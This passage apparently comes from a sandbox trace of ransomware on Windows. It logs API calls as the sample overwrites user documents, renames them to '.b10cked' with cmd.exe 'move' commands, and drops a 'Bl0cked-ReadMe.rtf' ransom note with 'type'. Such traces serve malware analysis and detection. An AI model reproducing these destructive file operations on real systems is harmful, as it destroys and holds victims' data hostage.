lpUsedDefaultChar=0x0) returned 13 [0233.540] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16db7 [0233.540] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.540] CloseHandle (hObject=0x1b4) returned 1 [0233.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\aK_FOd5jl.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS") returned 0x2d [0233.542] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.542] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xdf0, dwThreadId=0xf24)) returned 1 [0233.543] CloseHandle (hObject=0x120) returned 1 [0233.543] CloseHandle (hObject=0x1b4) returned 1 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.543] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 1 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.544] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.544] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.544] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.544] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.544] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.544] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xac8, dwThreadId=0xa94)) returned 1 [0233.545] CloseHandle (hObject=0x120) returned 1 [0233.545] CloseHandle (hObject=0x1b4) returned 1 [0233.546] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0233.546] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.546] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.546] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\mxjqisudxyxfeyxzgw.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29033560172) returned 1 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.548] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.548] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1490c [0233.548] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14df4 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14df4 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.549] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa6f9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.549] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa6f9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.550] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-42745, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6fb [0233.550] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa6f9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.550] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-42745, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6fb [0233.550] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa6f9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mXjqIsUDXYxFeYxzgw.ots", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0233.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mXjqIsUDXYxFeYxzgw.ots", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mXjqIsUDXYxFeYxzgw.ots", lpUsedDefaultChar=0x0) returned 22 [0233.554] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14df4 [0233.554] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.554] CloseHandle (hObject=0x1b4) returned 1 [0233.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS") returned 0x2d [0233.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.556] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b0, dwThreadId=0x2ac)) returned 1 [0233.560] CloseHandle (hObject=0x120) returned 1 [0233.560] CloseHandle (hObject=0x1b4) returned 1 [0233.560] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.560] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.560] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 2 [0233.560] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.560] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\or2f.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29035020609) returned 1 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.562] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 